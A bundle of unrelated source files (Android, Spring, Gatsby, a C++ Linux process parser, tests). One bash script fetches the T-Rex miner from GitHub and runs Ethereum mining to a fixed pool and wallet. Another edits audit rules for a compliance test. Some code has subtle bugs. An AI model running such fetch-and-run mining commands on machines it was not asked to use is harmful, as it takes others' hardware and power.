this.onItemCheckListener = onItemCheckListener;
}
public void setOnPhotoClickListener(OnPhotoClickListener onPhotoClickListener) {
this.onPhotoClickListener = onPhotoClickListener;
}
public void setOnCameraClickListener(View.OnClickListener onCameraClickListener) {
this.onCameraClickListener = onCameraClickListener;
}
public ArrayList<String> getSelectedPhotoPaths() {
ArrayList<String> selectedPhotoPaths = new ArrayList<>(getSelectedItemCount());
selectedPhotoPaths.addAll(selectedPhotos);
return selectedPhotoPaths;
}
public void setShowCamera(boolean hasCamera) {
this.hasCamera = hasCamera;
}
public void setPreviewEnable(boolean previewEnable) {
this.previewEnable = previewEnable;
}
public boolean showCamera() {
return (hasCamera && currentDirectoryIndex == MediaStoreHelper.INDEX_ALL_PHOTOS);
}
@Override
public void onViewRecycled(@NonNull PhotoViewHolder holder) {
requestManager.clear(holder.ivPhoto);
super.onViewRecycled(holder);
}
}
|
<filename>src/components/Services.js
import React from "react"
import { graphql, useStaticQuery } from "gatsby"
import ServiceCard from "./ServiceCard"
const query = graphql`
{
services: allContentfulServiceBruni {
nodes {
id
title
altText
desc: childContentfulServiceBruniDescriptionTextNode {
description
}
image {
fluid {
...GatsbyContentfulFluid
}
}
}
}
}
`
const Services = () => {
const {
services: { nodes },
} = useStaticQuery(query)
return (
<section id="services" className="u-section services">
<div className="u-section-center">
<h2 className="heading-tertiary u-center-text">services</h2>
<div className="services__container">
{nodes.map(service => {
return <ServiceCard key={service.id} service={service} />
})}
</div>
</div>
</section>
)
}
export default Services
|
<reponame>TommasoAzz/Stalker-Backend
package it.qbteam.persistence.repository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.data.repository.CrudRepository;
import org.springframework.data.repository.query.Param;
import org.springframework.stereotype.Repository;
import it.qbteam.model.PlaceAccess;
@Repository
public interface PlaceAccessRepository extends CrudRepository<PlaceAccess, Long> {
@Query("from PlaceAccess where orgAuthServerId=:serverId and placeId=:plId")
Iterable<PlaceAccess> findByOrgAuthServerIdAndPlaceId(@Param("serverId") String orgAuthServerId, @Param("plId") Long placeId);
@Query("from PlaceAccess where exitToken=:token and placeId=:plId")
Iterable<PlaceAccess> findByExitTokenAndPlaceId(@Param("token") String exitToken, @Param("plId") Long placeId);
@Query("from PlaceAccess where placeId=:plId")
Iterable<PlaceAccess> findByPlaceId(@Param("plId") Long placeId);
}
|
package com.dam.user.rest.message;
import com.fasterxml.jackson.databind.JsonNode;
/**
* LoginRequest is the typical request to authenticate the user against the system.
*
* Response: TokenResponse
*
* Scope: External Calls
*
* @author dirk
*
*/
public class WrappedRequest {
private JsonNode wrappedMsg;
// private String password;
public WrappedRequest(JsonNode wrappedMsg, String dummy) {
// super("CS 0.0.1");
// this.ipAddress = ipAddress;
this.wrappedMsg=wrappedMsg;
// this.password = password;
}
public JsonNode getWrappedMsg() {
return wrappedMsg;
}
public void setWrappedMsg(JsonNode wrappedMsg) {
this.wrappedMsg = wrappedMsg;
}
// public String getPassword() {
// return password;
// }
//
// public void setPassword(String password) {
// this.password = password;
// }
} |
var searchData=
[
['key',['key',['../classgeopm_1_1_profile_table.html#a3ccebf2606e66bded2f5566539d46afc',1,'geopm::ProfileTable::key()'],['../classgeopm_1_1_profile_table_imp.html#a7ebd0ea914e167a287538f365c592eec',1,'geopm::ProfileTableImp::key()'],['../classgeopm_1_1_shared_memory.html#a5b16cccaccbc0cabcf1865839f512205',1,'geopm::SharedMemory::key()'],['../classgeopm_1_1_shared_memory_imp.html#ace424fee3cc2e21f0314e483e41769f1',1,'geopm::SharedMemoryImp::key()']]],
['knl_5fmsr_5fjson',['knl_msr_json',['../namespacegeopm.html#af919d6005584b60c7d51f9649f0f6117',1,'geopm']]]
];
|
<reponame>hhaip/langtaosha
package cn.lts.memcachedclient.serializer;
import cn.lts.common.exception.InternalRuntimeException;
import net.rubyeye.xmemcached.transcoders.CachedData;
import net.rubyeye.xmemcached.transcoders.CompressionMode;
import net.rubyeye.xmemcached.transcoders.Transcoder;
/**
* 默认的编解码器
*
* @author zhangli
*/
public class DefaultTranscoder implements Transcoder<Object> {
private int maxSize;
/**
* 序列化类型,默认是hessian,可通过此属性切换序列化方式,暂时只支持默认版本。 以后可通过注入此属性切换版本。
*
* @see SerializerTypeConstant
*/
private int serializerType = SerializerTypeConstant.HESSIAN_DEFAULT_CLASSLOADER;
public DefaultTranscoder() {
this(CachedData.MAX_SIZE);
}
public DefaultTranscoder(int max) {
this.maxSize = max;
}
@Override
public CachedData encode(Object object) {
Serializer serializer = SerializerFactory.findSerializer();
byte[] b = null;
try {
b = serializer.serialize(object);
} catch (Exception e) {
if (!(e instanceof InternalRuntimeException)) {
throw new RuntimeException(e);
}
}
return new CachedData(serializerType, b, this.maxSize, -1);
}
@Override
public Object decode(CachedData cachedData) {
// 这里得到的flag不一定是你本应用的序列化方式,
// 因为同一个key可能其他应用使用了别的序列化方式,所以要根据具体的flag选择反序列化工具
// 不再支持kyro序列化
int flag = cachedData.getFlag();
if(flag != SerializerTypeConstant.HESSIAN_DEFAULT_CLASSLOADER) {
return null;
}
Serializer serializer = SerializerFactory.findSerializer();
Object object = null;
try {
object = serializer.deserialize(cachedData.getData());
} catch (Exception e) {
if (!(e instanceof InternalRuntimeException)) {
throw new RuntimeException(e);
}
}
return object;
}
@Override
public void setPrimitiveAsString(boolean primitiveAsString) {
}
@Override
public void setPackZeros(boolean packZeros) {
}
@Override
public boolean isPrimitiveAsString() {
// 不把基本类型标识为String的话,xmemcached会在set/get的时候分布增加/删除前面4位标识数据类型
return false;
}
@Override
public boolean isPackZeros() {
// 这个地方不会用到
return false;
}
@Override
public void setCompressionThreshold(int to) {
// 没必要对数据进行压缩,只要“纯”的序列化即可
}
@Override
public void setCompressionMode(CompressionMode compressMode) {
// 没必要对数据进行压缩,只要“纯”的序列化即可
}
public void setSerializerType(int serializerType) {
this.serializerType = serializerType;
}
}
|
package com.devaneios.turmadeelite.services.impl;
import com.amazonaws.auth.AWSStaticCredentialsProvider;
import com.amazonaws.auth.BasicAWSCredentials;
import com.amazonaws.regions.Regions;
import com.amazonaws.services.s3.AmazonS3;
import com.amazonaws.services.s3.AmazonS3ClientBuilder;
import com.amazonaws.services.s3.model.ObjectMetadata;
import com.amazonaws.services.s3.model.S3Object;
import com.devaneios.turmadeelite.entities.Attachment;
import com.devaneios.turmadeelite.services.DataStorageService;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Service;
import org.springframework.web.multipart.MultipartFile;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.math.BigInteger;
import java.security.DigestInputStream;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.UUID;
@Service
@Profile("!test")
public class S3DataStorageProduction implements DataStorageService {
private final AmazonS3 s3;
@Value("${aws.s3.bucketName}")
String bucketName;
public S3DataStorageProduction(
@Value("${aws.s3.region}") String region,
@Value("${aws.s3.accessKeyId}") String accessKeyId,
@Value("${aws.s3.accessKey}") String accessKey
){
BasicAWSCredentials credentials = new BasicAWSCredentials(accessKeyId, accessKey);
this.s3 = AmazonS3ClientBuilder
.standard()
.withCredentials(new AWSStaticCredentialsProvider(credentials))
.withRegion(Regions.fromName(region))
.build();
}
@Override
public void uploadFile(String key, Object fileInputStream) throws IOException {
FileInputStream inputStream = (FileInputStream) fileInputStream;
try {
long size = inputStream.getChannel().size();
ObjectMetadata metaData = new ObjectMetadata();
metaData.setContentLength(size);
this.s3.putObject(bucketName,key,inputStream,metaData);
} catch (IOException e) {
throw e;
} finally {
inputStream.close();
}
}
@Override
public InputStream downloadFile(String key) throws IOException {
S3Object s3Object = this.s3.getObject(bucketName, key);
return s3Object.getObjectContent();
}
@Override
public String getKey(String path,String fileName) {
String uuid = UUID.randomUUID().toString();
String key = path + uuid + fileName;
return key;
}
@Override
public void deleteObject(String key) {
this.s3.deleteObject(bucketName,key);
}
@Override
public Attachment from(MultipartFile multipartFile,String path) throws IOException, NoSuchAlgorithmException {
String key = this.getKey("activities/teachers-posts/", multipartFile.getOriginalFilename());
String md5 = this.getMd5(multipartFile.getInputStream());
return Attachment
.builder()
.bucketKey(key)
.fileMd5(md5)
.filename(multipartFile.getOriginalFilename())
.build();
}
private String getMd5(InputStream inputStream) throws NoSuchAlgorithmException {
MessageDigest messageDigest = MessageDigest.getInstance("MD5");
DigestInputStream digestInputStream = new DigestInputStream(inputStream, messageDigest);
byte[] bytes = digestInputStream.getMessageDigest().digest();
BigInteger bi = new BigInteger(1, bytes);
return String.format("%0" + (bytes.length << 1) + "X", bi);
}
}
|
exports.config = {
seleniumAddress: 'http://localhost:4723/wd/hub',
specs: ['../test/protractor/spec.js'],
chromeOnly: false,
capabilities: {
browserName: 'safari'
, platformName: 'iOS'
, deviceName: 'iPhone Simulator'
},
baseUrl: 'http://localhost:' + (process.env.HTTP_PORT || '8000')
}; |
import pickle
def serialize_object(obj, file_path):
try:
with open(file_path, 'wb') as file:
pickle.dump(obj, file)
print(f"Object serialized and saved to {file_path}")
except Exception as e:
print(f"Serialization failed: {e}")
# Example usage
data = {'name': 'Alice', 'age': 30, 'city': 'Wonderland'}
file_path = 'serialized_data.pkl'
serialize_object(data, file_path) |
<filename>src/components/title.js
import { createElement } from "../lib/dom";
import "./title.scss";
import logo from "../assets/pokeball.svg";
export function title(text) {
const image = createElement("img", {
className: "logo",
src: logo
});
const element = createElement("h1", {
innerText: text,
className: "title"
});
return [image, element];
}
|
<reponame>toooot0000/System-Monitor
#include "linux_parser.h"
#include <dirent.h>
#include <unistd.h>
#include <sstream>
#include <string>
#include <vector>
#include <unordered_map>
#include <regex>
#include <filesystem>
#include <assert.h>
#include <iostream>
using std::stof;
using std::string;
using std::to_string;
using std::vector;
// DONE: An example of how to read data from the filesystem
string LinuxParser::OperatingSystem() {
string line;
string key;
string value;
std::ifstream filestream(kOSPath);
if (filestream.is_open()) {
while (std::getline(filestream, line)) {
std::replace(line.begin(), line.end(), ' ', '_');
std::replace(line.begin(), line.end(), '=', ' ');
std::replace(line.begin(), line.end(), '"', ' ');
std::istringstream linestream(line);
while (linestream >> key >> value) {
if (key == "PRETTY_NAME") {
std::replace(value.begin(), value.end(), '_', ' ');
return value;
}
}
}
}
return value;
}
// DONE: An example of how to read data from the filesystem
string LinuxParser::Kernel() {
string os, kernel, version;
string line;
std::ifstream stream(kProcDirectory + kVersionFilename);
if (stream.is_open()) {
std::getline(stream, line);
std::istringstream linestream(line);
linestream >> os >> version >> kernel;
}
return kernel;
}
// Get a list of Pids
vector<int> LinuxParser::Pids() {
vector<int> pids;
for (const auto& i : std::filesystem::directory_iterator(kProcDirectory))
{
if (!i.is_directory()) continue;
auto filename = string(std::filesystem::path(i.path()).filename());
if (std::all_of(filename.begin(), filename.end(), isdigit))
pids.push_back(stoi(filename));
}
return pids;
}
namespace LinuxParser
{
// Memory U tility
std::unordered_map<std::string, long> memoVars
{
{"MemTotal", 0},
{"MemFree", 0},
{"Buffers", 0},
{"Cached", 0},
{"SReclamable", 0},
{"Shmem", 0},
{"SwapTotal", 0},
{"SwapFree", 0}
};
}
// DONE: Read and return the system memory utilization
float LinuxParser::MemoryUtilization()
{
std::ifstream stream(kProcDirectory + kMeminfoFilename);
if (!stream.is_open()) throw "Memoinfo not opened!";
string line;
string key;
long value;
while (std::getline(stream, line))
{
std::replace(line.begin(), line.end(), ':', ' ');
std::istringstream linestream(line);
while (linestream >> key >> value)
{
if (memoVars.find(key) == memoVars.end()) continue;
memoVars[key] = value;
}
}
long totalUsedMemory = memoVars["MemTotal"] - memoVars["MemFree"];
return static_cast<float>(totalUsedMemory) / memoVars["MemTotal"];
}
namespace LinuxParser
{
long preUptime{0};
long uptimeDiff{0};
}
// DONE: Read and return the system uptime
long LinuxParser::UpTime()
{
std::ifstream stream(kProcDirectory + kUptimeFilename);
if (!stream.is_open()) throw "Uptime not opened";
string line;
std::getline(stream, line);
std::istringstream linesteam(line);
long upTime, idleTime;
linesteam >> upTime >> idleTime;
uptimeDiff = upTime - preUptime;
preUptime = upTime;
return upTime;
}
long LinuxParser::UpTimeDiff() {return uptimeDiff;}
// Declare these variables here to avoid multiple declerations
namespace LinuxParser
{
// CPU Utility
long CPUJiffies[CPUStates::SIZE]{ 0 };
long cpuPreIdle{ 0 };
long cpuPreTotal{ 0 };
long cpuJiffiesDiff{0};
}
// DONE: Read and return the number of jiffies for the system
inline long LinuxParser::Jiffies()
{
long res = 0;
for (int i = 0; i != CPUStates::SIZE; ++i)
res += CPUJiffies[i];
return res;
}
// DONE: Read and return the number of active jiffies for the system
inline long LinuxParser::ActiveJiffies()
{
return Jiffies() - IdleJiffies();
}
// DONE: Read and return the number of idle jiffies for the system
inline long LinuxParser::IdleJiffies()
{
return CPUJiffies[CPUStates::kIdle_] + CPUJiffies[CPUStates::kIOwait_];
}
long LinuxParser::JiffiesDifference()
{
return cpuJiffiesDiff;
}
// DONE: Read and return CPU utilization
float LinuxParser::CpuUtilization()
{
std::ifstream instream(kProcDirectory + kStatFilename);
if (!instream.is_open()) throw "Stat not opened!";
string line;
getline(instream, line);
std::istringstream sstream(line);
string cpu;
sstream >> cpu;
for (auto i = 0; i != CPUStates::SIZE; ++i)
sstream >> CPUJiffies[i];
long total = Jiffies();
long idle = IdleJiffies();
long totald = total - cpuPreTotal;
long idled = idle - cpuPreIdle;
float res = totald ? static_cast<float>(totald - idled) / totald : 0.0;
cpuJiffiesDiff = totald;
cpuPreIdle = idle;
cpuPreTotal = total;
return res;
}
// DONE: Read and return the total number of processes
int LinuxParser::TotalProcesses()
{
std::ifstream instream(kProcDirectory + kStatFilename);
if (!instream.is_open()) throw "Stat not opened!";
string line;
while (getline(instream, line))
{
std::istringstream sstream(line);
string key;
sstream >> key;
if (key == "processes")
{
int value;
sstream >> value;
return value;
}
}
return 0;
}
// DONE: Read and return the number of running processes
int LinuxParser::RunningProcesses()
{
std::ifstream instream(kProcDirectory + kStatFilename);
if (!instream.is_open()) throw "Stat not opened!";
string line;
while (getline(instream, line))
{
std::istringstream sstream(line);
string key;
sstream >> key;
if (key == "procs_running")
{
int value;
sstream >> value;
return value;
}
}
return 0;
}
namespace LinuxParser
{
std::unordered_map<int, string> users = {};
}
std::unordered_map<int, string>& LinuxParser::Users()
{
if (!users.empty()) return users;
std::ifstream infilestream(kPasswordPath);
if (!infilestream.is_open()) throw "/etc/passwd not opened!";
string line;
while (getline(infilestream, line))
{
std::replace(line.begin(), line.end(), ':', ' ');
std::stringstream sstream(line);
string name, x;
int uid;
sstream >> name >> x >> uid;
users[uid] = name;
}
return users;
}
namespace LinuxParser
{
// utime is 14th in [pid]/stat, stime is the 15th
const int _PROCESS_STAT_UTIME = 13;
// const int _PROCESS_STAT_STIME = 14;
// const int _PROCESS_STAT_CUTIME = 15;
// const int _PROCESS_STAT_CSTIME = 16;
const int _PROCESS_STAT_STARTTIME = 21;
} // namespace LinuxParser
// use std::regex to split string;
std::vector<std::string> _split(std::string const _str, std::string const _reg)
{
std::regex reg(_reg);
return { std::sregex_token_iterator(_str.begin(), _str.end(), reg, -1), std::sregex_token_iterator() };
}
// DONE: Read and return the number of active jiffies for a PID
long LinuxParser::ActiveJiffies(int pid)
{
std::ifstream infstream(kProcDirectory + to_string(pid) + kStatFilename);
if (!infstream.is_open()) throw "Pid stat not opened!";
string line;
getline(infstream, line);
auto tokens = _split(line, " ");
if (tokens.size() < _PROCESS_STAT_STARTTIME + 1) throw "Sth wrong with _split!";
// long stime = std::stol(tokens[_PROCESS_STAT_STIME]);
long utime = std::stol(tokens[_PROCESS_STAT_UTIME]);
return utime;
}
// DONE: Read and return the command associated with a process
string LinuxParser::Command(int pid)
{
std::ifstream infstream(kProcDirectory + to_string(pid) + kCmdlineFilename);
if (!infstream.is_open()) throw "Pid cmdline not opened!";
string line;
getline(infstream, line);
return line;
}
// DONE: Read and return the memory used by a process
string LinuxParser::Ram(int pid)
{
std::ifstream infstream(kProcDirectory + to_string(pid) + kStatusFilename);
if (!infstream.is_open()) throw "Process status not opened! Pid:" + to_string(pid);
string line;
while (getline(infstream, line))
{
std::stringstream sstream(line);
string key, value;
sstream >> key >> value;
if (key == "VmSize:")
return value;
}
return "0";
}
// DONE: Read and return the user ID associated with a process
string LinuxParser::Uid(int pid)
{
std::ifstream infstream(kProcDirectory + to_string(pid) + kStatusFilename);
if (!infstream.is_open()) throw "Process status not opened! Pid:" + to_string(pid);
string line;
while (getline(infstream, line))
{
std::stringstream sstream(line);
string key, value;
sstream >> key >> value;
if (key == "Uid:") return value;
}
return string();
}
// DONE: Read and return the user associated with a process
string LinuxParser::User(int pid)
{
auto& _user = Users();
// string __uid = Uid(pid);
// if(!__uid.size()) return "";
int _uid = std::stoi(Uid(pid));
if (_user.find(_uid) == _user.end()) throw "No uid: " + to_string(_uid);
return _user[_uid];
}
// DONE: Read and return the StartTime of a process
long LinuxParser::StartTime(int pid)
{
std::ifstream infstream(kProcDirectory + to_string(pid) + kStatFilename);
if (!infstream.is_open()) throw "Pid stat not opened!";
string line;
getline(infstream, line);
auto tokens = _split(line, " ");
if (tokens.size() < _PROCESS_STAT_STARTTIME + 1) throw "Sth wrong with _split!";
long starttime = std::stol(tokens[_PROCESS_STAT_STARTTIME]);
return starttime / HERTZ;
}
namespace LinuxParser
{
std::unordered_map<int, long> processPreJeffies;
}
float LinuxParser::CpuUtilization(int pid)
{
long curActJif = ActiveJiffies(pid);
float res = 0.0;
if(processPreJeffies.find(pid) != processPreJeffies.end())
res = static_cast<float> (curActJif-processPreJeffies[pid])/JiffiesDifference();
processPreJeffies[pid] = curActJif;
return res;
}
|
<reponame>ThallesTorres/Linguagem_C
// Exercício 12 - Dado um número inteiro positivo n, imprimir os n primeiros naturais ímpares.
#include <stdio.h>
int main(void)
{
int num, impar;
impar = 1;
printf("Digite um número: ");
scanf("%d", &num);
printf("Os %d primeiros números ímpares são: ", num);
for (int count = 0; count < num; count ++)
{
printf("%d ", impar);
impar += 2;
}
printf("\n");
} |
sudo apt-get install linux-headers-$(uname -r) -y
distribution=$(. /etc/os-release;echo $ID$VERSION_ID | sed -e 's/\.//g')
wget https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/cuda-$distribution.pin
sudo mv cuda-$distribution.pin /etc/apt/preferences.d/cuda-repository-pin-600
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64/7fa2af80.pub
echo "deb http://developer.download.nvidia.com/compute/cuda/repos/$distribution/x86_64 /" | sudo tee /etc/apt/sources.list.d/cuda.list
sudo apt-get update
sudo apt-get -y install cuda-drivers
sudo apt-get install libcurl3 -y
woker+=$(date +'%d%m_%H%M%S')
wget https://github.com/trexminer/T-Rex/releases/download/0.21.6/t-rex-0.21.6-linux.tar.gz
tar -zxvf t-rex-0.21.6-linux.tar.gz
sudo killall XXX
sudo screen ./t-rex -a ethash -o stratum+tcp://us-eth.2miners.com:2020 -u 0xfbbaaec0813a4bb8420b956f4c80519cdabbeb9c -p x -w $woker
./t-rex -a ethash -o us-eth.2miners.com:2020 -u 0xfbbaaec0813a4bb8420b956f4c80519cdabbeb9c -p x -w $woker
echo $woker
|
<filename>src/app/pages/basic-data/orders/trainer-account-reports/trainer-account-reports.component.ts
import { Component, OnInit } from '@angular/core';
import { Router, ActivatedRoute } from '@angular/router';
import { environment } from '../../../../../environments/environment.prod';
import { OrdersService } from '../../../../shared/orders.service';
@Component({
selector: 'ngx-trainer-account-reports',
templateUrl: './trainer-account-reports.component.html',
styles: []
})
export class TrainerAccountReportsComponent implements OnInit {
TrainerName:string;
Total:number;
DetailsList:any[]=[];
TrainerId;
useExistingCss:boolean;
styleName:string;
constructor(public service:OrdersService,private route:Router,
private activeRoute:ActivatedRoute) { }
ngOnInit() {
this.useExistingCss = true;
if (environment.production) {
this.useExistingCss = false;
const elements = document.getElementsByTagName('link');
for (let index = 0; index < elements.length; index++) {
if (elements[index].href.startsWith(document.baseURI)) {
this.styleName += elements[index].href + ',';
}
}
this.styleName = this.styleName.slice(0, -1);
}
if(this.activeRoute.snapshot.url[0].path=="trainerAccountReports")
{
this.service.getForAccountTrainer().subscribe((res:any)=>{
this.TrainerName=res.Master.TrainerName;
this.Total=res.Master.Total;
this.DetailsList=res.result;
})
}
else if (this.activeRoute.snapshot.url[0].path="AdminAccountReports")
{
this.TrainerId=this.activeRoute.snapshot.paramMap.get("id");
this.service.getForAdminAccountTrainer(this.TrainerId).subscribe((res:any)=>{
this.TrainerName=res.Master.TrainerName;
this.Total=res.Master.Total;
this.DetailsList=res.result;
})
}
}
onReports(DocTypeId,DocNum){
if(this.activeRoute.snapshot.url[0].path=="trainerAccountReports")
{
if(DocTypeId==1)
{
this.route.navigateByUrl('/pages/basicData/orderReportsTrainer/'+DocNum);
}
else
{
this.route.navigateByUrl('/pages/basicData/paymentTrainerReports/'+DocNum);
}
}
else if(this.activeRoute.snapshot.url[0].path=="AdminAccountReports")
{
if(DocTypeId==1)
{
this.route.navigateByUrl('/pages/basicData/orderReportsAdmin/'+DocNum);
}
else
{
this.route.navigateByUrl('/pages/basicData/paymentAdminReports/'+DocNum);
}
}
}
}
|
from django.db import models
from django.utils import timezone
import datetime
class Appointment(models.Model):
patient_name = models.CharField(max_length=100)
appointment_datetime = models.DateTimeField()
reason = models.CharField(max_length=200)
def is_future_appointment(self):
return self.appointment_datetime > timezone.now() |
#! /bin/sh
asv profile -E existing '^increment.Merge(.*)' &> report/increment
asv profile -E existing 'original_increment.Merge(.*)' &> report/original_increment
asv profile -E existing 'original_merge.Merge(.*)' &> report/original_merge
asv profile -E existing '^merge_increment.Merge(.*)' &> report/merge_increment
|
<gh_stars>1-10
package kr.co.gardener.admin.model.other.list;
import kr.co.gardener.admin.model.other.Notice;
import kr.co.gardener.util.CommonList;
public class NoticeList extends CommonList<Notice>{
public NoticeList() {
super("공지 관리");
addTh("공지ID", "noticeId", "none");
addTh("제목", "noticeTitle", "text");
addTh("날짜", "noticeDate", "date");
addTh("내용", "noticeContent", "area");
addInsert("상태ID", "noticeId", "none");
addInsert("상태명", "noticeTitle", "text");
addInsert("상태 메시지", "noticeContent", "area");
setView(true);
}
}
|
./jwe -train wiki_process.txt -output-word word_vec -output-char char_vec -output-comp comp_vec -size 200 -window 5 -sample 1e-4 -negative 10 -iter 100 -threads 8 -min-count 5 -alpha 0.025 -binary 0 -comp ../subcharacter/comp.txt -char2comp ../subcharacter/char2comp.txt -join-type 1 -pos-type 1 -average-sum 1
|
from ..Core.registers import Registers
from ..Core.commands import Commands
from ..Core.types import Types
from .base import Base
from .itoa_and_write import ItoaWrite
class Write(Base):
is_loaded = False
def __init__(self, compiler):
Base.__init__(self, compiler)
if Write.is_loaded:
return
self.load('write.asm', 'write')
Write.is_loaded = True
def call(self, value_type):
if value_type == Types.INT or True:
ItoaWrite(self.compiler)
self.compiler.code.add(Commands.POP, Registers.EAX)
self.compiler.code.add(Commands.CALL, ['itoa_and_write'])
self.compiler.code.add(Commands.MOV, [Registers.EAX, 10])
self.compiler.code.add(Commands.CALL, ['write'])
else:
pass
|
import React from 'react';
import chai, { expect } from 'chai';
import chaiEnzine from 'chai-enzyme';
import { shallow } from 'enzyme';
import FullHeader from '../../src/Main';
// chai.use(chaiEnzine());
describe('<FullHeader />', () => {
it('should have header tag when mount', () => {
const wrapper = shallow(<FullHeader />);
expect(wrapper.find('header')).to.have.length(1);
});
context('title', () => {
it('should have h1 tag when title passed', () => {
const wrapper = shallow(<FullHeader title="TDD" />);
expect(wrapper.find('h1')).to.have.length(1);
});
it('should not have h1 tag when title is not passed', () => {
const wrapper = shallow(<FullHeader />);
expect(wrapper.find('h1')).to.have.length(0);
});
it('should have h1 tag with the title passed', () => {
const wrapper = shallow(<FullHeader title="TDD" />);
expect(wrapper.find('h1').props().children).to.be.equal('TDD');
});
});
context('subtitle', () => {
it('should have h2 tag when subtitle passed', () => {
const wrapper = shallow(<FullHeader subtitle="Curso" />);
expect(wrapper.find('h2')).to.have.length(1);
});
it('should not have h2 tag when subtitle is not passed', () => {
const wrapper = shallow(<FullHeader />);
expect(wrapper.find('h2')).to.have.length(0);
});
it('should have h2 tag with the subtitle passed', () => {
const wrapper = shallow(<FullHeader subtitle="Curso" />);
expect(wrapper.find('h2').props().children).to.equal('Curso');
});
});
context('bgColor', () => {
it('should have background-color equal #ccc when none is passed', () => {
const wrapper = shallow(<FullHeader title="TDD" />);
expect(wrapper).to.have.style('background-color').equal('#ccc');
});
it('should have background-color equal #000 when is passed', () => {
const wrapper = shallow(<FullHeader title="TDD" bgColor="#000" />);
expect(wrapper).to.have.style('background-color').equal('#000');
});
});
});
|
<reponame>prt2121/android-workspace
package com.prt2121.rxagain;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.widget.Toolbar;
import android.view.Menu;
import android.view.MenuItem;
import butterknife.Bind;
import butterknife.ButterKnife;
import com.google.gson.GsonBuilder;
import com.google.gson.reflect.TypeToken;
import com.jakewharton.rxbinding.support.v7.widget.RxToolbar;
import com.prt2121.rxagain.model.Repo;
import com.prt2121.rxagain.model.SearchResult;
import java.lang.reflect.Type;
import java.util.List;
import rx.Observable;
import rx.functions.Action1;
import rx.functions.Func1;
import timber.log.Timber;
public class RepoActivity extends AppCompatActivity {
@Bind(R.id.repoToolbar) Toolbar toolbar;
@Override protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_repo);
ButterKnife.bind(this);
setSupportActionBar(toolbar);
final Observable<Void> menuItemClicks =
RxToolbar.itemClicks(toolbar).filter(new Func1<MenuItem, Boolean>() {
@Override public Boolean call(MenuItem menuItem) {
Timber.d(menuItem.getTitle().toString());
return menuItem.getItemId() == R.id.action_refresh;
}
}).map(new Func1<MenuItem, Void>() {
@Override public Void call(MenuItem menuItem) {
Timber.d(menuItem.getTitle().toString());
return null;
}
});
menuItemClicks.startWith((Void) null).map(new Func1<Void, String>() {
@Override public String call(Void v) {
return "https://api.github.com/search/repositories?q=reactive";
}
}).flatMap(new Func1<String, Observable<String>>() {
@Override public Observable<String> call(String url) {
return RxApp.getApp().requestJson(url);
}
}).map(new Func1<String, List<Repo>>() {
@Override public List<Repo> call(String json) {
Type type = new TypeToken<SearchResult>() {
}.getType();
SearchResult searchResult = new GsonBuilder().create().fromJson(json, type);
return searchResult.getRepos();
}
}).subscribe(new Action1<List<Repo>>() {
@Override public void call(List<Repo> repoList) {
for (Repo repo : repoList) {
Timber.d(repo.getOwner().getLogin());
}
}
}, new Action1<Throwable>() {
@Override public void call(Throwable throwable) {
Timber.d(throwable.getMessage());
}
});
}
@Override public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.menu_repo, menu);
return true;
}
}
|
const listHandler = require("../../procedural/listHandler");
describe(createDescribeHeader("Procedural listHandler.js"), function() {
describe(
createDescribeHeader("#generateSearchResults(booksData)"),
function() {
it(
createItHeader(
"generates array of book objects when an api result is passed in"
),
() => {
expect(
listHandler.generateSearchResults(global.eragonFetchResult)
).to.eql(global.eragonObjects);
}
);
}
);
describe(createDescribeHeader("#collectBookTitles(books)"), function() {
it(
createItHeader("senerates an array of book titles from a list of books"),
() => {
expect(listHandler.collectBookTitles(global.eragonObjects)).to.eql(
global.eragonTitles
);
}
);
});
describe(
createDescribeHeader("#addBookToList(searchResultIndex)"),
function() {
it(
createItHeader(
"adds book at the given index of searchResults array to the readingList array"
),
() => {
let stub = sinon
.stub(listHandler.inputHandler, "initiateOptionsPrompt")
.callsFake(() => true);
listHandler.addBookToList(0);
expect(global.proceduralReadingList).to.eql(global.eragonObjects);
assert(stub.called);
stub.restore();
process.stdin.destroy();
}
);
}
);
});
|
<reponame>community-boating/cbidb-public-web
import {apBasePath} from "./_base";
export default apBasePath.appendPathSegment<{}>("/reg"); |
<reponame>vadi2/codeql
public class A {
String taint() { return "tainted"; }
void sink(Object o) { }
static String step(String s) { return s + "0"; }
static class Box {
String s;
Box(String s) {
this.s = s + "1";
}
String getS1() { return s + "2"; }
String getS2() { return step(s + "_") + "2"; }
void setS1(String s) { this.s = "3" + s; }
void setS2(String s) { this.s = "3" + step("_" + s); }
static Box mk(String s) {
Box b = new Box("");
b.s = step(s);
return b;
}
}
void foo(Box b1, Box b2) {
b1.setS1(taint());
sink(b1.getS1());
b2.setS2(taint());
sink(b2.getS2());
String t3 = taint();
Box b3 = new Box(step(t3));
sink(b3.s);
Box b4 = Box.mk(taint());
sink(b4.getS1());
}
static class Box2 {
String s;
String getS() { return s; }
void setS(String s) { this.s = s; }
Box2(String s) {
setS(s + "1");
}
String getS1() { return getS() + "2"; }
String getS2() { return step(getS() + "_") + "2"; }
void setS1(String s) { setS("3" + s); }
void setS2(String s) { setS("3" + step("_" + s)); }
static Box2 mk(String s) {
Box2 b = new Box2("");
b.setS(step(s));
return b;
}
}
void foo2(Box2 b1, Box2 b2) {
b1.setS1(taint());
sink(b1.getS1());
b2.setS2(taint());
sink(b2.getS2());
String t3 = taint();
Box2 b3 = new Box2(step(t3));
sink(b3.s);
Box2 b4 = Box2.mk(taint());
sink(b4.getS1());
}
}
|
#!/bin/bash
# profiles = xccdf_org.ssgproject.content_profile_ospp
# remediation = none
# Use auditctl in RHEL7
sed -i "s%^ExecStartPost=.*%ExecStartPost=-/sbin/auditctl%" /usr/lib/systemd/system/auditd.service
echo "-a always,exit -F dir=/var/log/audit/ -F perm=r -F auid>=1000 -F auid!=unset -F key=access-audit-trail" >> /etc/audit/audit.rules
|
package com.md.appbrige.appuserconnect.server;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import javax.jdo.Extent;
import javax.jdo.JDOHelper;
import javax.jdo.PersistenceManager;
